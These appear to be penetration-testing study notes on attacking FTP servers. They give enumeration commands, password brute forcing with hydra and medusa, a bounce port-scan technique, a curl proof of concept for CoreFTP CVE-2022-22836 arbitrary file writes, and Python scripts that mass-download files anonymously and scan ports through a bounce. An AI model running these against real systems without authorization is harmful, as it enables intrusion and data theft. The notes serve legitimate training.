> See FTP Footprinting notes for more details: [[5 - CPTS Notes/2 - Footprinting Module/Service Enumeration/FTP (20,21)|FTP (20,21)]]

# Introduction
- File Transfer Protocol (FTP) listens on TCP/21 by default (the control channel; data transfers use TCP/20 in active mode or a server-chosen high port in passive mode)
- To attack an FTP server, we can abuse misconfigurations or excessive privileges (anonymous login, weak credentials, readable or writable directories), exploit known vulnerabilities in the server software, or discover new ones

# Enumeration
```bash
sudo nmap -sC -sV -p21 <target_ip>   #default scripts: banner, ftp-anon (anonymous login) and ftp-bounce
```

# Misconfigurations
- Check for anonymous login: user `anonymous`, any password is accepted (an e-mail address is the convention); `ftp-anon` also lists the root directory when it succeeds
```bash
ftp <target_ip>                                                 #interactive: log in as anonymous with any password
nxc ftp <target_ip> -u anonymous -p ''                          #non-interactive anonymous login check
wget -m --no-passive-ftp ftp://anonymous:anonymous@<target_ip>  #mirror every readable file over the anonymous login (active mode)
```

# Connecting to FTP
```bash
ftp <target_ip> <alt_port>                                      #alt port is optional; prompts for user and password
ftp ftp://<user_name>:<password>@<target_ip>:<alt_port>/        #URL form accepted by tnftp (the BSD client)
nc -nv <target_ip> 21                                           #raw control channel: type USER/PASS by hand
telnet <target_ip> 21
openssl s_client -connect <target_ip>:21 -starttls ftp          #explicit FTPS: issues AUTH TLS after the banner
```

# FTP Attacks
## Brute Forcing
```bash
medusa -u <username> -P /usr/share/wordlists/rockyou.txt -h <target_ip> -M ftp -n <alt_port>   #one user, password list
hydra -L users.list -p <password> ftp://<target_ip> -s <alt_port>                               #user list, one password (spray)
#both tools take a single username/password or a list: medusa -u/-U and -p/-P, hydra -l/-L and -p/-P
```

## Bounce Attack
- The `PORT` command tells the server which address and port to connect to for the next data transfer; a server that accepts any address in `PORT` can be told to connect to a third machine, turning it into a proxy for scanning hosts that only the FTP server can reach (e.g. an internal network behind it)
- The port state is read from the server's reply to the following `LIST`: a data connection that is established means the target port is open, `425 Can't build data connection` means closed (or filtered)
- Nearly all modern FTP servers block this attack by rejecting a `PORT` address that differs from the client's own, so it is mostly found on old or embedded servers
- The `ftp-bounce` NSE script, run by `nmap -sC`, reports whether the server allows it
![[images/Pasted image 20251016111217.png]]
```bash
#-b <user>:<pass>@<ftp_server>: use the FTP server as the scan source for <final_target_ip>
nmap -Pn -v -n -p80 -b anonymous:password@<target_ftp_server> <final_target_ip>
```

## CoreFTP Exploit
- CoreFTP Server before build 727 is vulnerable to [CVE-2022-22836](https://nvd.nist.gov/vuln/detail/CVE-2022-22836)
- Vuln: the server's HTTP(S) listener does not sanitize the path of an `HTTP PUT` request, so an authenticated user can send `../` sequences to traverse outside their FTP root (`authenticated directory/path traversal`) and write an `arbitrary file`
- `--path-as-is` stops curl from collapsing the `../` segments before sending the request; `-k` accepts the server's untrusted certificate; `--basic` forces HTTP Basic auth with the FTP credentials
```bash
curl -k -X PUT -H "Host: <IP>" --basic -u <username>:<password> --data-binary "PoC." --path-as-is https://<IP>/../../../../../../whoops   #create file whoops with content: PoC.
```
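The anonymous-login check and the recursive pull from the Misconfigurations section, scripted with the standard library so it works where `wget` or `nxc` are not available. This is an added example written for these notes, not code from the CPTS module or from any of the tools above. It assumes the server prints Unix-style `ls -l` listings for `LIST` (the regex, the `anonymous@example.com` password, the `loot` output directory and the placeholder target address are all my own choices), and it refuses any remote name that would write outside the destination directory, because a hostile server can return `../` entries in a listing.

```python
"""Anonymous FTP check and recursive pull (added example; hypothetical script, not from the module)."""
import ftplib
import os
import re
from typing import Iterator, List, Optional, Tuple

# Unix-style LIST line as most servers print it, e.g.
# "drwxr-xr-x    2 ftp      ftp          4096 Oct 16 11:12 pub"
# Assumption: the server emits this ls -l layout (IIS-style listings are not handled).
_LIST_RE = re.compile(
    r"^([-dl])[rwxsStT-]{9}[+.@]?\s+\d+\s+\S+\s+\S+\s+(\d+)"   # type, perms, links, owner, group, size
    r"\s+\S+\s+\d+\s+[\d:]+\s+(.+?)(?: -> .*)?$"              # month, day, time-or-year, name [-> link target]
)


def parse_list_line(line: str) -> Optional[Tuple[str, bool, int]]:
    """Return (name, is_dir, size) for one LIST line, or None for 'total N' and other noise."""
    m = _LIST_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    kind, size, name = m.groups()
    if name in (".", ".."):
        return None
    return name, kind == "d", int(size)


def anonymous_login(host: str, port: int = 21, timeout: float = 10.0) -> Optional[ftplib.FTP]:
    """Send USER anonymous / PASS <email>; return the live session on success, None on 530."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    try:
        ftp.login("anonymous", "anonymous@example.com")  # any password is accepted; an e-mail is the convention
    except ftplib.error_perm:                            # 530 Login incorrect: anonymous access disabled
        ftp.close()
        return None
    return ftp


def walk(ftp: ftplib.FTP, path: str = ".") -> Iterator[Tuple[str, int]]:
    """Yield (remote_path, size) for every file reachable from path, recursing into directories."""
    lines: List[str] = []
    ftp.retrlines("LIST" if path == "." else f"LIST {path}", lines.append)
    for line in lines:
        parsed = parse_list_line(line)
        if parsed is None:
            continue
        name, is_dir, size = parsed
        child = name if path == "." else f"{path.rstrip('/')}/{name}"
        if is_dir:
            yield from walk(ftp, child)
        else:
            yield child, size


def safe_local_path(dest: str, remote: str) -> Optional[str]:
    """Map a remote path under dest; refuse names that would escape it (a hostile server can list '../')."""
    local = os.path.realpath(os.path.join(dest, *remote.split("/")))
    root = os.path.realpath(dest)
    return local if local.startswith(root + os.sep) else None


def mirror(ftp: ftplib.FTP, dest: str) -> int:
    """Download everything walk() finds into dest; return the number of files written."""
    count = 0
    for remote, _size in walk(ftp):
        local = safe_local_path(dest, remote)
        if local is None:
            continue                                  # traversal attempt in the listing: skip it
        os.makedirs(os.path.dirname(local), exist_ok=True)
        try:
            with open(local, "wb") as fh:
                ftp.retrbinary(f"RETR {remote}", fh.write)
        except ftplib.error_perm:                     # unreadable file or a symlink to a directory
            os.remove(local)
            continue
        count += 1
    return count


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "10.129.14.136"  # placeholder target address
    session = anonymous_login(target)
    if session is None:
        print("anonymous login refused")
    else:
        with session:
            print(f"anonymous login OK, pulled {mirror(session, 'loot')} files into ./loot")
```

Run it as `python3 ftp_anon_pull.py <target_ip>`; the listing parser is the part worth reusing, since it is what decides which entries to recurse into and which to fetch.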
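The PORT exchange behind the bounce attack from the section above, as an added Python example written for these notes (my own script, not nmap's `-b` implementation): it encodes the RFC 959 `PORT h1,h2,h3,h4,p1,p2` argument for an arbitrary target, issues `LIST` to force the server to connect there, and turns the reply codes into a verdict. The function and variable names, the FTP server port (TCP/21) and the sample reply strings in the comments are assumptions; the reply codes themselves (200, 425, 150/226, 500) are the standard ones the section relies on.

```python
"""FTP bounce probe (added example; hypothetical script, not nmap's bounce scan)."""
import ftplib
import ipaddress
from typing import Dict, Iterable


def encode_port_command(target_ip: str, port: int) -> str:
    """Build the RFC 959 PORT argument h1,h2,h3,h4,p1,p2 (port split big-endian into two bytes).
    The bounce exists because the address in here is whatever the client says it is."""
    if not 0 < port < 65536:
        raise ValueError(f"port out of range: {port}")
    octets = str(ipaddress.IPv4Address(target_ip)).split(".")   # raises on a malformed address
    return "PORT " + ",".join(octets + [str(port >> 8), str(port & 0xFF)])


def classify_bounce_reply(port_reply: str, list_reply: str) -> str:
    """Turn the server's replies to PORT and to the following LIST into a scan verdict.
    A data connection the server managed to open means the target port accepted it."""
    if not port_reply.startswith("200"):
        return "bounce-refused"   # e.g. "500 Illegal PORT command": server checks the PORT address
    code = list_reply[:3]
    if code in ("125", "150", "226"):
        return "open"             # server opened the data connection and started/finished the listing
    if code == "425":
        return "closed"           # "425 Can't build data connection": RST or timeout from the target
    return "unknown"


def bounce_probe(ftp_host: str, user: str, password: str, target_ip: str, port: int,
                 timeout: float = 10.0) -> str:
    """Log in to the FTP server and make it connect to target_ip:port on our behalf."""
    with ftplib.FTP() as ftp:
        ftp.connect(ftp_host, 21, timeout=timeout)
        ftp.login(user, password)
        try:
            port_reply = ftp.sendcmd(encode_port_command(target_ip, port))
        except ftplib.error_perm as exc:          # 5xx to PORT: bounce blocked, nothing more to learn
            return classify_bounce_reply(str(exc), "")
        try:
            list_reply = ftp.sendcmd("LIST")      # the server now connects to target_ip:port itself
        except (ftplib.error_temp, ftplib.error_perm) as exc:
            list_reply = str(exc)                 # ftplib raises on 4xx/5xx; the message is the reply line
        else:
            if list_reply.startswith(("125", "150")):
                try:
                    ftp.voidresp()                # drain the trailing 226 so the control channel stays in sync
                except ftplib.Error:
                    pass
        return classify_bounce_reply(port_reply, list_reply)


def bounce_scan(ftp_host: str, user: str, password: str, target_ip: str,
                ports: Iterable[int]) -> Dict[int, str]:
    """One fresh session per port keeps a stuck data connection from poisoning later probes."""
    return {p: bounce_probe(ftp_host, user, password, target_ip, p) for p in ports}


if __name__ == "__main__":
    import sys
    # usage: python3 ftp_bounce.py <ftp_server> <user> <password> <target_ip> <port>[,<port>...]
    host, user, pw, target, ports = sys.argv[1:6]
    for p, verdict in bounce_scan(host, user, pw, target, [int(x) for x in ports.split(",")]).items():
        print(f"{target}:{p} {verdict}")
```

If every port comes back `closed`, the server may be accepting `PORT` but silently refusing to connect to foreign addresses; confirm the bounce actually works against a port you already know is open on the target before trusting the results.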